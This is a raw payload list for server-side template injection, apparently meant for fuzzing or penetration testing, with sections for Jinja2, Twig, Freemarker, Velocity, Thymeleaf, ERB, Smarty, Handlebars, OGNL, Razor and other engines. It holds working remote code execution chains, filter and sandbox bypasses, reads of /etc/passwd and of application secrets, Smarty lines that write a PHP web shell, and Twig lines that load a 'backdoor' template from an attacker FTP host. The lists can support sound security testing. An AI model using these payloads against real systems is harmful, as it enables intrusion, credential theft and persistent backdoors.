# ── Detection Probes (Math) ──
${7*7}
{{7*7}}
<%= 7*7 %>
#{7*7}
{7*7}
*{7*7}
{{7*'7'}}
${7*'7'}
${{7*7}}
#set($x=7*7)$x

# ── Jinja2 (Python) ──
{{config}}
{{config.items()}}
{{self.__init__.__globals__}}
{{request.environ}}
{{request.application.__self__._get_data_for_json.__code__}}
{{''.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__bases__[0].__subclasses__()}}
{{().__class__.__bases__[0].__subclasses__()}}
{{[].__class__.__bases__[0].__subclasses__()}}
{{'foo'.__class__.__base__.__subclasses__()}}
{{lipsum.__globals__['os'].popen('id').read()}}
{{cycler.__init__.__globals__.os.popen('id').read()}}
{{joiner.__init__.__globals__.os.popen('id').read()}}
{{namespace.__init__.__globals__.os.popen('id').read()}}
{{request.__class__.__mro__[1].__subclasses__()}}
{{url_for.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{get_flashed_messages.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{% for c in ''.__class__.__mro__[1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{c.__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()}}{% endif %}{% endfor %}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}

# ── Jinja2 WAF Bypass ──
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')}}
{{request['__class__']['__mro__'][1]}}
{{'a]'.__class__.__mro__[1].__subclasses__()}}
{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbases\x5f\x5f')}}
{%set a='__cla'+'ss__'%}{{''[a]}}
{{''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()}}
{{''['__cla'+'ss__']}}
{{''['\x5f\x5fclass\x5f\x5f']}}

# ── Twig (PHP) ──
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['id']|filter('exec')}}
{{['id']|filter('passthru')}}
{{['cat /etc/passwd']|filter('system')}}
{{app.request.server.all|join(',')}}
{{dump(app)}}
{{app.request.request.get('cmd')}}
{{'id'|filter('system')}}
{{_self.env.setCache("ftp://attacker/")}}

# ── Freemarker (Java) ──
${7*7}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
[#assign ex="freemarker.template.utility.Execute"?new()]${ex("id")}
${object.getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke(object.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")}
<#assign classloader=object.class.protectionDomain.classLoader><#assign owc=classloader.loadClass("freemarker.template.ObjectWrapper")><#assign dwf=owc.getField("DEFAULT_WRAPPER").get(null)><#assign ec=classloader.loadClass("freemarker.template.utility.Execute")>${dwf.newInstance(ec,null)("id")}

# ── Velocity (Java) ──
#set($x='')#set($rt=$x.class.forName('java.lang.Runtime'))#set($chr=$x.class.forName('java.lang.Character'))#set($str=$x.class.forName('java.lang.String'))#set($ex=$rt.getRuntime().exec('id'))$ex.waitFor()#set($out=$ex.getInputStream())#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
$class.inspect("java.lang.Runtime").type.getRuntime().exec("id").waitFor()
#set($e="e")$e.getClass().forName("java.lang.Runtime").getMethod("exec",$e.getClass()).invoke($e.getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"id")

# ── Thymeleaf (Java) ──
__${T(java.lang.Runtime).getRuntime().exec("id")}__::.x
${T(java.lang.Runtime).getRuntime().exec('id')}
__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x
*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}

# ── Pebble (Java) ──
{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}{{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(([bytes])::toArray()) }}

# ── Mako (Python) ──
<%import os%>${os.popen("id").read()}
<%import os;os.popen("id").read()%>
${self.module.cache.util.os.popen("id").read()}
<%import subprocess%>${subprocess.check_output("id",shell=True)}

# ── ERB (Ruby) ──
<%= system("id") %>
<%= `id` %>
<%= IO.popen("id").read() %>
<%= File.read("/etc/passwd") %>
<%= Dir.entries("/") %>
<%= require 'open3'; Open3.capture2("id")[0] %>
<%= exec("id") %>

# ── Slim (Ruby) ──
= system("id")
= `id`
= IO.popen("id").read()

# ── Smarty (PHP) ──
{php}echo `id`;{/php}
{system('id')}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php system('id'); ?>",self::clearConfig())}
{if system('id')}{/if}
{$smarty.version}
{$smarty.template}

# ── Handlebars (JavaScript) ──
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id')"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

# ── Nunjucks (JavaScript) ──
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
{{constructor.constructor("return this.process.mainModule.require('child_process').execSync('id')")()}}

# ── EJS (JavaScript) ──
<%= process.mainModule.require('child_process').execSync('id').toString() %>
<%- include('/etc/passwd') %>

# ── Jade/Pug (JavaScript) ──
#{7*7}
- var x = root.process.mainModule.require('child_process').execSync('id').toString()
#{x}

# ── Tornado (Python) ──
{% import os %}{{os.popen("id").read()}}
{%import os%}{{os.popen("id").read()}}

# ── Django (Python) ──
{% debug %}
{{settings.SECRET_KEY}}
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}{{e.user.get_username}}:{{e.user.password}}{% endfor %}

# ── Dust.js (JavaScript) ──
{@if cond="(1==1)"}true{/if}
{@if cond="require('child_process').execSync('id')"}x{/if}

# ── Polyglot Detection ──
${{<%[%'"}}%\.
{{7*7}}${7*7}<%= 7*7 %>#{7*7}*{7*7}
${7*7}{{7*7}}<%= 7*7 %>
a]}}{{7*7}}${7*7}<%= 7*7 %>#{7*7}
{{constructor.constructor('return 7*7')()}}

# ── Extended Detection Probes ────────────────────────────────────
{{7*7}}
${7*7}
<%= 7*7 %>
#{7*7}
*{7*7}
{{7*'7'}}
{{49}}
${49}
#{49}
{{3+4}}
${3+4}
<%= 3+4 %>
{{191*7}}
${191*7}
<%= 191*7 %>

# ── Jinja2 Extended ──────────────────────────────────────────────
{{request.environ}}
{{request.args}}
{{request.form}}
{{request.cookies}}
{{request.headers}}
{{g}}
{{session}}
{{config['SECRET_KEY']}}
{{config.get('SECRET_KEY')}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.__class__.__mro__[2].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{''.__class__.__mro__[2].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].popen('id').read()}}
{%for x in ().__class__.__base__.__subclasses__()%}{%if "warning" in x.__name__%}{{x()._module.__builtins__['__import__']('os').popen('id').read()}}{%endif%}{%endfor%}
{{lipsum.__globals__['__builtins__']['__import__']('os').popen('id').read()}}
{{cycler.__init__.__globals__['os'].popen('id').read()}}
{{joiner.__init__.__globals__['os'].popen('id').read()}}
{{namespace.__init__.__globals__['os'].popen('id').read()}}
{{url_for.__globals__.__builtins__.__import__('os').popen('id').read()}}
{{get_flashed_messages.__globals__.__builtins__.__import__('os').popen('id').read()}}

# ── Twig (PHP) ───────────────────────────────────────────────────
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("id")}}
{{['id']|filter('system')}}
{{['cat /etc/passwd']|filter('system')}}
{{app.request.server.all|join(',')}}
{{_self.env.setCache("ftp://attacker.com:1234")}}{{_self.env.loadTemplate("backdoor")}}
{{'/etc/passwd'|file_excerpt(1,30)}}

# ── Mako (Python) ────────────────────────────────────────────────
${self.module.cache.util.os.popen('id').read()}
<%import os;x=os.popen('id').read()%>${x}
${self.module.cache.util.os.system('id')}
<% import subprocess; x=subprocess.check_output('id',shell=True) %>${x}

# ── Smarty (PHP) ─────────────────────────────────────────────────
{php}echo `id`;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
{system('id')}
{exec('id')}
{if system('id')}{/if}

# ── FreeMarker (Java) ────────────────────────────────────────────
<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}
[#assign ex='freemarker.template.utility.Execute'?new()]${ex('id')}
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(",")}
<#assign classloader=article.class.protectionDomain.classLoader>
${7*7}
[=7*7]

# ── Velocity (Java) ──────────────────────────────────────────────
#set($x='')##
#set($rt=$x.class.forName('java.lang.Runtime'))##
#set($chr=$x.class.forName('java.lang.Character'))##
#set($str=$x.class.forName('java.lang.String'))##
#set($ex=$rt.getRuntime().exec('id'))##
$x.class.forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null).exec('id')

# ── Thymeleaf (Java) ─────────────────────────────────────────────
${T(java.lang.Runtime).getRuntime().exec('id')}
${#rt = @java.lang.Runtime@getRuntime(),#rt.exec('id')}
__${T(java.lang.Runtime).getRuntime().exec('id')}__::.x
*{T(java.lang.Runtime).getRuntime().exec('id')}

# ── Pebble (Java) ────────────────────────────────────────────────
{% set cmd = 'id' %}{% set bytes = (1).TYPE.forName('java.lang.Runtime').methods[6].invoke(null,null).exec(cmd).inputStream.readAllBytes() %}{{ (1).TYPE.forName('java.lang.String').constructors[0].newInstance(([bytes]).toArray()) }}

# ── ERB (Ruby) ───────────────────────────────────────────────────
<%= system('id') %>
<%= `id` %>
<%= IO.popen('id').read %>
<%= File.read('/etc/passwd') %>
<%= Dir.entries('/') %>

# ── Handlebars (Node.js) ─────────────────────────────────────────
{{#with "s" as |string|}}{{#with "e"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub "constructor")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push "return require('child_process').execSync('id')"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}

# ── Blind SSTI (Time-Based) ─────────────────────────────────────
{{range(1000000)|join('')}}
${T(java.lang.Thread).sleep(5000)}
<%= sleep(5) %>
{{'a'*1000000}}

# ── Jinja2 Sandbox Escape Chains ─────────────────────────────────
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['sys'].modules['os'].popen('id').read()}}
{{().__class__.__mro__[1].__subclasses__()[396]('id',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{request.__class__.__mro__[3].__subclasses__()}}
{{[].__class__.__base__.__subclasses__()}}
{{'a'.__class__.__mro__[1].__subclasses__()}}
{{(1).__class__.__mro__[1].__subclasses__()}}
{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
{{[].__class__.__mro__[1].__subclasses__()[127].__init__.__globals__['system']('id')}}
{{request['__class__']['__mro__'][2]['__subclasses__']()}}
{{lipsum['__globals__']['os']['popen']('id')['read']()}}
{{cycler['__init__']['__globals__']['os']['popen']('id')['read']()}}

# ── Jinja2 Filter Bypass ────────────────────────────────────────
{% set chr=().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(250).__init__.__globals__.__getitem__('__builtins__').__getitem__('chr') %}{{().__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(250).__init__.__globals__.__getitem__('os').popen(chr(105)~chr(100)).read()}}
{{()|attr('\x5f\x5fclass\x5f\x5f')}}
{{()|attr('__class__')|attr('__mro__')}}
{%print(lipsum.__globals__)%}

# ── Twig Extended ────────────────────────────────────────────────
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("cat /etc/passwd")}}
{{['cat /etc/passwd']|filter('exec')}}
{{['id']|filter('passthru')}}
{{[0]|reduce('system','id')}}
{{'ls'|filter('system')}}
{{app.request.query.get('cmd')|filter('system')}}
{{_self.env.display('cat /etc/passwd'|filter('system'))}}
{{'/etc/passwd'|file_excerpt(-1,-1)}}
{{constant('phpinfo')}}

# ── Pug/Jade (Node.js) ──────────────────────────────────────────
#{7*7}
-var x = root.process.mainModule.require('child_process').execSync('id').toString()
#{root.process.mainModule.require('child_process').execSync('id')}

# ── Nunjucks (Node.js) ──────────────────────────────────────────
{{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
{{range.constructor("return require('child_process').execSync('id').toString()")()}}

# ── Django Templates ─────────────────────────────────────────────
{{settings.SECRET_KEY}}
{{settings.DATABASES}}
{% debug %}
{% load log %}{% get_admin_log 10 as log %}{% for e in log %}{{e.user}} {{e.change_message}}{% endfor %}

# ── Expression Language (Java) ───────────────────────────────────
${applicationScope}
${sessionScope}
${requestScope}
${pageContext}
${T(java.lang.Runtime).getRuntime().exec('id')}
${T(java.lang.System).getenv()}
${T(java.lang.Class).forName('java.lang.Runtime').getDeclaredMethods()}
#{T(java.lang.Runtime).getRuntime().exec('id')}
*{T(java.lang.Runtime).getRuntime().exec('id')}

# ── OGNL (Struts) ────────────────────────────────────────────────
%{(#rt=@java.lang.Runtime@getRuntime().exec('id'))}
${#rt=@java.lang.Runtime@getRuntime(),#rt.exec('id')}
%{#cmd='id',#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')),#cmds=(#iswin?{'cmd','/c',#cmd}:{'/bin/sh','-c',#cmd}),#p=new java.lang.ProcessBuilder(#cmds),#p.redirectErrorStream(true),#process=#p.start()}

# ── Razor (ASP.NET) ─────────────────────────────────────────────
@(1+2)
@{var x = System.Diagnostics.Process.Start("cmd","/c whoami");}
@System.IO.File.ReadAllText("c:\\windows\\win.ini")

# ── Polyglot SSTI ────────────────────────────────────────────────
${{<%[%'"}}%\
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}*{7*7}
a]}}{{7*7}}${7*7}
